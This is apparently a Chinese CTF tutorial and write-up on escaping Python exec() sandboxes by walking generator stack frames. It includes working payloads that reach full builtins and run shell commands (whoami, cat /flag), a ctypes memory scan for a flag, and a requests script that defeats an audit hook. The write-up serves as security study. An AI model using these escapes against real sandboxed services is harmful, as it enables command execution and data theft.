原理
在学习栈帧之前,我们要先掌握python中的生成器这个概念
生成器
普通的python函数,只要开始执行就不会停止一直到遇到return或者代码块结束,这然后个函数的执行环境,局部变量和栈帧都会被销毁,但是生成器的执行逻辑不一样,关键字也不是return而是yield
生成器可以当做一个可以随时停止可继续的函数,当生成器函数执行到yield时,它会将yield后面的数据返回并且保存当前所有的局部变量、指令等等,当再次调用生成器时,会从上次暂停的位置继续执行,直到遇见下一个yield
举个简单的例子
def f():
a = 1
while True:
yield a
a += 1
f = f()#获得生成器,函数没有被执行
print(next(f))
#1
print(next(f))
#2
print(next(f))
#3除了用next调用,也可以用for循环遍历生成器当中的数值
def f():
a = 1
while a < 6:
yield a
a += 1
f = f()
for item in f:
print(item)
"""
1
2
3
4
5
"""生成器有一个生成器表达式,类似于列表推导式,不过使用的是圆括号而不是方括号,生成器表达式会在调用的时候逐个生成值,而不是像列表推导式一样一次性全部生成,和普通函数与生成器函数的区别差不多
举个例子
res = []#用for循环遍历
a = (a for a in range(10))
for i in a:
res.append(i)
print(res)
res = []#用next调用
a = (a for a in range(100))
for i in range(10):#只会调用
tmp = next(a)
res.append(tmp)
print(res)
#或者写的简单一点
a = ( a for a in range(10))
print([i for i in a])
#再简单点
a = ( a for a in range(10))
print([*a])
#输出都为: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]生成器属性
gi_frame
gi_frame属性返回生成器对象当前的栈帧。通过访问栈帧,可以获取生成器当前执行的代码行号和局部变量等信息。并且生成器必须处于运行状态才能够获取到,如果生成器已经结束了运行或者只创建了还没有被调用,那么栈帧则已经被销毁或者还没有创建,没法用gi_frame获取
gi_code
gi_code属性返回一个代码对象,包含生成器函数的字节码和其他编译时信息。可以通过co_name、co_filename等属性获取更多信息
gi_running
gi_running属性是一个布尔值,表示生成器是否正在运行
也可以用inspect模块,这里就不多介绍了
栈帧属性
在任何一个函数或者方法调用都会创建一个栈帧,函数执行完毕之后这个栈帧就会随着销毁。栈帧中包含着当前函数或者方法的局部变量、参数、指向上一个栈帧的指针等等,栈帧中有下面几个主要的属性:
f_locals: 一个字典,包含当前函数或方法作用域内所有局部变量的
f_globals: 一个字典,包含当前函数或方法所在模块的全局变量
f_builtins: 包含当前的一系列内置函数、内置类、内置异常等等
f_back: 指向上一级栈帧
f_code: 指向当前栈帧对应的代码对象,里面含有字节码、常量表等等
f_lineno/f_lasti: 当前执行到的行号/当前执行到的字节码指令索引
def P():
a = 1
b = 2
yield a
yield b
yield 3
P = P()
frame = P.gi_frame
print(f"当前栈帧: {frame}\n")
print(f"局部变量: {frame.f_locals}\n")
print(f"全局变量: {frame.f_globals}\n")
print(f"builtins: {frame.f_builtins}")栈帧沙箱逃逸
Pyjail中我们的命令都是在一个被限制的沙箱中执行的,而这个沙箱就是一个栈帧,里面所包含的对象是被处理过的,一般没办法使用函数,那么如何利用栈帧在不适用函数的情况下实现rce呢?
根据前面了解到知道任何一个函数或者方法调用都会创建一个栈帧,根据后进后出的规则排序,题目在创建沙箱的时候也是如此,拿下面的例子来说明,在运行这段代码的时候,main()作为入口,然后调用func_A->func_B,在进入func_B之后,我们查看一下栈帧的顺序就能够明白了,首先最先调用main()先入栈,然后是func_A,最后是func_B
import sys
def func_B():
f = sys._getframe()
print(f"当前栈帧(最顶层): {f.f_code.co_name}")
print(f"上一级(f_back): {f.f_back.f_code.co_name}")
print(f"再上一级(f_back.f_back): {f.f_back.f_back.f_code.co_name}")
def func_A():
func_B()
def main():
func_A()
if __name__ == "__main__":
main()
#当前栈帧 (最顶层): func_B
#上一级 (f_back): func_A
#再上一级 (f_back.f_back): main在题目当中,会用exec来创造沙箱环境,如下面这个例子,我们的命令是在exec中被执行的。脚本启动后的环境调用了exec,然后exec调用我们写的payload,和刚才的例子作比较就是
初始环境—>main
exec—>func_A
payload—>func_B
paylaod = ""#我们可控的地方
safe_builtins = {
'dict':dict,
'list':list,
}
exec(payload, safe_builtins)#执行命令结合上面的分析,理一下rce的思路
获取当前的栈帧 -> 返回上一级也就是初始环境的栈帧 -> 拿到完整的builtins然后实现rce
gi_frame能够获取当前生成器的栈帧
在获取之后用f_back逃逸到之前的栈帧实现rce
一个简单的例子:
payload = "" # <-----可控
safe_builtins = {"__builtins__": None}
exec(payload, safe_builtins)根据上面的分析,可以得到payload如下
def f():
yield g.gi_frame.f_back.f_back
g = f()
frame = next(g)
frame = g.send(None)
frame = [ x for x in g ][0]
frame = [*g][0]
##如果沙箱中没有next的话第一个就用不了
#------------------------------
#这样也可以,更简洁一点
g = (g.gi_frame.f_back.f_back for _ in [1])
frame = [*g][0]
#------------------------------
#也可以直接这样
frame = [f.f_back.f_back for f in [g.gi_frame for g in [(lambda: (yield))()] if [g.send(None)]]][0]
#------------------------------
b = frame.f_globals['__builtins__']
b.print(b.__import__('os').popen('whoami').read())解释一下payload的构造方式
def f():
yield g.gi_frame.f_back.f_back
g = f()
##frame = next(g)
##frame = g.send(None)
##frame = [ x for x in g ][0]
frame = [*g][0]没什么好说的
g = (g.gi_frame.f_back.f_back for _ in [1])
frame = [*g][0]通过生成器的特性,只有被调用时会触发生成器表达式内的代码,因此在将[*g]赋给frame的时候才开始执行,在此之前g已经是一个生成器的对象了,在[*g]中的*是解包操作符,会将g中的所有数据提取出来,这时就会触发遍历,从而执行获取栈帧的操作
frame = [f.f_back.f_back for f in [g.gi_frame for g in [(lambda: (yield))()] if [g.send(None)]]][0]
#全部拆开就是下面的这个形式(应该没写错)
P = [(lambda : (yield))()]
R = []
for g in P:
if [g.send(None)]:
R.append(g.gi_frame)
res = []
for f in frame:
res.append(f.f_back.f_back)
frame = res[0]这一个只有在比较新的python版本中才能用,不是很建议用这个
[(lambda:(yield))()]
- 定义了一个匿名函数
lambda:(yield),然后通过...()直接调用了这个匿名函数并放入一个列表中[...]
[g.g_frame for g in [...] if [g.send(None)]]
- 在
if [g.send(None)]中,涉及到send()这个函数的作用,用send调用一个生成器时,如果yield没有返回值则返回send()中的参数,也就是会变成if [None]。在列表推导式中,会先进行判断再执行前面的代码,因此利用这个if判断在用for遍历前启动了这个生成器,所以[g.g_frame for g in [...] ...]能够获取到当前的栈帧然后放入这个列表中
[f.f_back.f_back for f in [...]][0]
- 这里就是利用
f_back进行栈帧逃逸到初始环境当中
tips
在3.12以前,列表推导式相当于一个临时的匿名函数,会在调用栈中多插入一层,而列表解包是一个语法糖,不会创建新的栈帧,隐藏前者在创建时的栈帧会深一层
总结一下,其实再看还是很简单的,逃逸的操作很简单,有关属性基本就用到了gi_frame、f_back然后想办法触发这个生成器
在学习的时候看到几道题目很有意思,也记录一下
题目
第九届中国海洋大学信息安全竞赛 菜狗工具#2
源码
from flask import *
import io
import time
app = Flask(__name__)
black_list = [
'__build_class__', '__debug__', '__doc__', '__import__',
'__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input'
]
new_builtins = dict([
(key, val) for key, val in __builtins__.__dict__.items() if key not in black_list
])
flag = "flag{xxxxxx}"
flag = "DISPOSED"
@app.route("/")
def index():
return redirect("/static/index.html")
@app.post("/run")
def run():
out = io.StringIO()
script = str(request.form["script"])
def wrap_print(*args, **kwargs):
kwargs["file"] = out
print(*args, **kwargs)
new_builtins["print"] = wrap_print
try:
exec(script, {"__builtins__": new_builtins})
except Exception as e:
wrap_print(e)
ret = out.getvalue()
out.close()
return ret
time.sleep(5) # current source file is deleted
app.run('0.0.0.0', port=9001)题目是沙箱逃逸,用继承链也可以打,但是在学习栈帧逃逸就不用继承链了
在运行完之后源码会删除,环境变量和文件中都没有flag了
参考文章中的方法是获取地址暴力扫描。因为flag是创建之后被覆盖了,所以原本的flag和覆盖后的字符在内存中的位置相差不远,在找到被覆盖后的”DISPOSED”,再从这个地址往回并查找地址内容就能够找到原本的flag
首先利用globals获取全局变量,拿到flag的地址,用ctypes.cast把获取到的地址强制转换成c语言的字符型指针(c_char_p),从而通过value读取这个地址的内容
在64位的系统中,内存地址一般是8字节对齐的,所以每次循环的步长为8
payload
g = (g.gi_frame.f_back.f_back for _ in [1])
frame = [*g][0]
b = frame.f_globals
ctypes = b['__builtins__'].__import__('ctypes')
flag_addr = id(b['flag'])
for i in range(10000):
txt = ctypes.cast((flag_addr-i*8), ctypes.c_char_p).value
if b"FLAG{" in txt:
print(txt)官方的wp
sys = print.__globals__["__builtins__"].__import__('sys')
io = print.__globals__["__builtins__"].__import__('io')
dis = print.__globals__["__builtins__"].__import__('dis')
threading = print.__globals__["__builtins__"].__import__('threading')
frame = sys._current_frames()[threading.main_thread().ident]
while frame is not None:
out = io.StringIO()
dis.dis(frame.f_code,file=out)
content = out.getvalue()
out.close()
print(content)
frame = frame.f_back直接获取到主线程的内存然后反编译
gc
gc(Garbage Collector,垃圾回收器),gc里面包含着内容中所有的东西(列表、字典、字符串、栈帧、函数…)
通过gc.get_objects()获取所有的对象,这时只要还留存在内存中的数据都能够被找到,但是这里要注意python的”引用计数”机制,如果计数器归零了就会在内存中被删除,这个对象也就彻底消失了

mossfern[CSICN 2024]
main.py
import os
import subprocess
from flask import Flask, request, jsonify
from uuid import uuid1
app = Flask(__name__)
runner = open("/app/runner.py", "r", encoding="UTF-8").read()
flag = open("/flag", "r", encoding="UTF-8").readline().strip()
@app.post("/run")
def run():
id = str(uuid1())
try:
data = request.json
open(f"/app/uploads/{id}.py", "w", encoding="UTF-8").write(
runner.replace("THIS_IS_SEED", flag).replace("THIS_IS_TASK_RANDOM_ID", id))
open(f"/app/uploads/{id}.txt", "w", encoding="UTF-8").write(data.get("code", ""))
run = subprocess.run(
['python', f"/app/uploads/{id}.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
timeout=3
)
result = run.stdout.decode("utf-8")
error = run.stderr.decode("utf-8")
print(result, error)
if os.path.exists(f"/app/uploads/{id}.py"):
os.remove(f"/app/uploads/{id}.py")
if os.path.exists(f"/app/uploads/{id}.txt"):
os.remove(f"/app/uploads/{id}.txt")
return jsonify({
"result": f"{result}\n{error}"
})
except:
if os.path.exists(f"/app/uploads/{id}.py"):
os.remove(f"/app/uploads/{id}.py")
if os.path.exists(f"/app/uploads/{id}.txt"):
os.remove(f"/app/uploads/{id}.txt")
return jsonify({
"result": "None"
})
if __name__ == "__main__":
app.run("0.0.0.0", 5000)runner.py
def source_simple_check(source):
"""
Check the source with pure string in string, prevent dangerous strings
:param source: source code
:return: None
"""
from sys import exit
from builtins import print
try:
source.encode("ascii")
except UnicodeEncodeError:
print("non-ascii is not permitted")
exit()
for i in ["__", "getattr", "exit"]:
if i in source.lower():
print(i)
exit()
def block_wrapper():
"""
Check the run process with sys.audithook, no dangerous operations should be conduct
:return: None
"""
def audit(event, args):
from builtins import str, print
import os
for i in ["marshal", "__new__", "process", "os", "sys", "interpreter", "cpython", "open", "compile", "gc"]:
if i in (event + "".join(str(s) for s in args)).lower():
print(i)
os._exit(1)
return audit
def source_opcode_checker(code):
"""
Check the source in the bytecode aspect, no methods and globals should be load
:param code: source code
:return: None
"""
from dis import dis
from builtins import str
from io import StringIO
from sys import exit
opcodeIO = StringIO()
dis(code, file=opcodeIO)
opcode = opcodeIO.getvalue().split("\n")
opcodeIO.close()
for line in opcode:
if any(x in str(line) for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"]):
if any(x in str(line) for x in ["randint", "randrange", "print", "seed"]):
break
print("".join([x for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"] if x in str(line)]))
exit()
if __name__ == "__main__":
from builtins import open
from sys import addaudithook
from contextlib import redirect_stdout
from random import randint, randrange, seed
from io import StringIO
from random import seed
from time import time
source = open(f"/app/uploads/THIS_IS_TASK_RANDOM_ID.txt", "r").read()
source_simple_check(source)
source_opcode_checker(source)
code = compile(source, "<sandbox>", "exec")
addaudithook(block_wrapper())
outputIO = StringIO()
with redirect_stdout(outputIO):
seed(str(time()) + "THIS_IS_SEED" + str(time()))
exec(code, {
"__builtins__": None,
"randint": randint,
"randrange": randrange,
"seed": seed,
"print": print
}, None)
output = outputIO.getvalue()
if "THIS_IS_SEED" in output:
print("这 runtime 你就嘎嘎写吧, 一写一个不吱声啊,点儿都没拦住!")
print("bad code-operation why still happened ah?")
else:
print(output)分析一下
source_simple_check
检查是否是ascii码的形式,不能含有--、getattr、exit
source_opcode_checker
将源码编译成字节码,检测"LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD",并且字符串中必须含有"randint", "randrange", "print", "seed"之一
hook
设置审计钩子,不允许使用"marshal", "__new__", "process", "os", "sys", "interpreter", "cpython", "open", "compile", "gc"
在source_opcode_checker中,在对字符串检测时,匹配到白名单中的字符会触发break导致跳出循环,从而就绕过了对”LOAD_GLOBAL”, “IMPORT_NAME”, “LOAD_METHOD”的检测。
只要在开头触发一次break就能跳过对后续字符的检测,然后就可以利用栈帧逃逸到沙箱外,但是该怎么读flag呢
上面提到过f_code指向当前栈帧对应的代码对象,里面含有字节码、常量表等等。在seed(str(time()) + "THIS_IS_SEED" + str(time()))这个位置,“THIS_IS_SEED”被替换为了flag,从而保存在了当前栈帧的常量池中,于是就可以通过读取常量池来获取flag,也就在f_code的co_consts中,不过在最后对输出的值进行了检测,需要加上一个分隔符来绕过这个检测
(randint.gi_frame for _ in [1])
a = (a.gi_frame.f_back.f_back for i in [1])
frame = [*a][0]
g = frame.f_globals
b = g['_'+'_builtins_'+'_']
code = frame.f_code
str = b.str
for i in str(code.co_consts):
print(i,end = " ")
还看到一个解法,覆写函数来绕过的addaudithook
源码中在检测"marshal", "__new__", "process", "os", "sys", "interpreter", "cpython", "open", "compile", "gc"时是用的os._exit(1)来结束进程的,也就是只要我们能够将os._exit()覆写掉,就算被检测到也会继续进行,但是os._exit中的os是在函数内部重新导入的,我们从exec逃逸能够逃逸到runner.py环境中但是没法进入block_wrapper()之中,也就没法直接覆写
真的没办法了吗?
注意到,在block_wrapper()中除了重新导入了os,还从builtins中导入了str和print,而这里的builtins正是我们能够逃逸到的runner.py中的builtins,那么我们就能够污染print,但是污染了print后改怎么覆写_exit呢
print是在block_wrapper()中执行的,此时print的上一级栈帧就是block_wrapper()的环境,那么就可以从print逃逸到上一级然后覆盖其中的os._exit
覆盖完成之后利用eval拼接来rce
import requests
url = "http://124.221.168.69:20008/run"
payload_code = """
(randint for _ in [1])
a = (a.gi_frame.f_back.f_back for i in [1])
frame = [*a][0]
b = frame.f_globals['_'+'_builtins_'+'_']
or_print = b.print
def fake(Pr0):
a = (a.gi_frame.f_back.f_back for i in [1])
frame = [*a][0]
l = frame.f_locals
if 'os' in l:
b.setattr(l['os'], '_ex'+'it', print)
print("success")
b.print = fake
eval = b.eval
get = eval('b.get''attr', {'b': b})
impor = get(b, '_''_import_''_')
system = impor('os').system
system('cat /flag')
"""
response = requests.post(url, json={"code": payload_code})
print(response.text)在这个hook中过滤了gc,现在绕过了,想到能不能用gc读到flag呢
改了好久也没读到,放弃了
在mossfen这道题里面用到了一个读常量池的方法,然后我想到第一个题能不能用这个方法读取呢
答案是不行
在第一题中flag是在run()环境外部的一个变量,没法通过栈帧逃逸到相应的环境,所以没法用f_code拿到
总结
栈帧逃逸就是一个小知识点,方法一看就会,写也很简单,但是实际到了题目中再加加其他的东西结合一下难度就会提升很多,以后琢磨琢磨还能怎么考